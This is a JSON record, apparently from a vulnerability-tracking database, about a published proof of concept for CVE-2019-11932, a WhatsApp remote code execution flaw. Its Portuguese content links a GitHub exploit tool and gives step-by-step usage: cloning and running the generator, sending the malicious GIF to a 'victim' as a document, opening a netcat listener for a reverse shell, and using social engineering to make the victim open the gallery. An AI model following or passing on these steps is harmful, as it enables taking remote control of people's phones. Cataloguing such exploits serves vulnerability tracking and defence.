{"uuid": "cff0abc7-f729-419b-8b89-433fba3cdfe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-11932", "type": "published-proof-of-concept", "source": "https://t.me/DarkArmyChannel/5", "content": "https://github.com/TinToSer/whatsapp_rce\n\nEsta \u00e9 uma carga \u00fatil de gera\u00e7\u00e3o automatizada para CVE-2019-11932 (execu\u00e7\u00e3o remota de c\u00f3digo do WhatsApp)\n\nInstala\u00e7\u00e3o autom\u00e1tica do GCC (sem comando de danos, voc\u00ea pode ver que isso \u00e9 de c\u00f3digo aberto)\nSalvando no\u00a0arquivo\u00a0.GIF\n\nCOMO USAR:\n\napt install git \n\ngit clone https://github.com/TinToSer/whatsapp_rce\n\ncd WhatsRCE && bash start.sh\n\nComo obter o Shell?\n\nVoc\u00ea acabou de enviar o\u00a0arquivo\u00a0.GIF\u00a0para o usu\u00e1rio v\u00edtima\u00a0COMO UM DOCUMENTO, N\u00c3O IMAGENS\n\nE defina o nc / netcat para a porta que voc\u00ea definir nas ferramentas WhatsRCE {\u00a0nc -lnvp your_port\u00a0}\n\nVoc\u00ea pode usar o ataque de engenharia social para atrair as v\u00edtimas para iniciar essa explora\u00e7\u00e3o\ndiga \u00e0 v\u00edtima para abrir a galeria via whatsapp e envie a v\u00edtima para enviar as fotos (n\u00e3o h\u00e1 necessidade, basta acessar a galeria sem problemas). Depois disso, alguns segundos depois, voc\u00ea receber\u00e1 uma conex\u00e3o shell da v\u00edtima", "creation_timestamp": "2020-05-16T16:09:53.000000Z"}